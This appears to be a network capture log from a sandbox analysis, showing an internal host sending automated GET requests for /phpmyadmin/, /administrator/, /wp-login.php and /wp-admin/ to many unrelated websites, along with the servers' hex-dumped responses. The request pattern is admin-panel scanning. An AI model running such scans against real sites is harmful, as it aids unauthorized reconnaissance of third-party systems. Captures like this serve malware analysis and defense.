Feb 21, 2024 00:26:10.125303984 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:10 GMT server: Apache set-cookie: __tad=1708471570.7681945; expires=Fri, 17-Feb-2034 23:26:10 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.6	56776	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.979840040 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.287990093 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:10 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 37 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d Data Ascii: 574<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![])+(+!+[]+!![]+[])+(+![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]
Feb 21, 2024 00:26:10.288053036 CET	457	IN	Data Raw: 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 Data Ascii: +!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("
Feb 21, 2024 00:26:10.288098097 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.6	56788	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.979881048 CET	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.258491039 CET	463	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/phpmyadmin/ Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.6	57548	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.985522985 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.600163937 CET	924	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 482 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:09 GMT server: nginx set-cookie: sid=6ded8ae0-d047-11ee-b3a8-b2ef86b04514; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:17 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 33 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 78 61 57 52 6e 62 57 46 77 62 32 6c 73 63 47 4d 30 4e 7a 45 33 63 7a 45 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 7a 41 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4d 44 59 79 4d 6a 67 7a 66 51 2e 54 76 6d 58 67 72 61 77 35 47 42 4c 5a 7a 72 32 39 7a 58 6b 4e 43 51 6a 55 39 62 77 4c 45 69 53 6b 56 4a 6e 4f 30 52 4c 36 61 51 26 73 69 64 3d 36 64 65 64 38 61 65 30 2d 64 30 34 37 2d 31 31 65 65 2d 62 33 61 38 2d 62 32 65 66 38 36 62 30 34 35 31 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/phpmyadmin/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc3MCwiaWF0IjoxNzA4NDcxNTcwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxxaWRnbWFwb2lscGM0NzE3czEiLCJuYmYiOjE3MDg0NzE1NzAsInRzIjoxNzA4NDcxNTcwMDYyMjgzfQ.TvmXgraw5GBLZzr29zXkNCQjU9bwLEiSkVJnO0RL6aQ&sid=6ded8ae0-d047-11ee-b3a8-b2ef86b04514');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.6	56819	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.988075972 CET	176	OUT	GET /wp-login.php HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.256850004 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:10.257884979 CET	218	OUT	GET /wp-admin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://mlbx.matrix.jp/wp-login.php
Feb 21, 2024 00:26:10.527129889 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.6	57603	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.002100945 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.598804951 CET	924	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 482 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:09 GMT server: nginx set-cookie: sid=6df037c1-d047-11ee-a4ba-b2ef1919bd1c; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:17 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 33 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 78 61 6d 52 31 61 48 4e 30 61 48 46 6b 63 6d 38 78 4f 44 4d 79 59 32 6f 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 7a 41 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4d 44 63 35 4d 7a 49 79 66 51 2e 4f 74 38 54 37 53 41 42 37 43 55 6e 72 6d 45 38 5a 34 6f 76 52 66 6a 4e 58 4b 4d 45 4d 6b 50 37 32 43 35 6c 30 6d 44 75 35 50 41 26 73 69 64 3d 36 64 66 30 33 37 63 31 2d 64 30 34 37 2d 31 31 65 65 2d 61 34 62 61 2d 62 32 65 66 31 39 31 39 62 64 31 63 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/phpMyAdmin/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc3MCwiaWF0IjoxNzA4NDcxNTcwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxxamR1aHN0aHFkcm8xODMyY2oiLCJuYmYiOjE3MDg0NzE1NzAsInRzIjoxNzA4NDcxNTcwMDc5MzIyfQ.Ot8T7SAB7CUnrmE8Z4ovRfjNXKMEMkP72C5l0mDu5PA&sid=6df037c1-d047-11ee-a4ba-b2ef1919bd1c');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.6	57649	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.011950970 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.179049969 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:10 GMT server: Apache set-cookie: __tad=1708471570.4664018; expires=Fri, 17-Feb-2034 23:26:10 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.6	57724	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.069314957 CET	182	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.233321905 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.6	57814	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.074459076 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
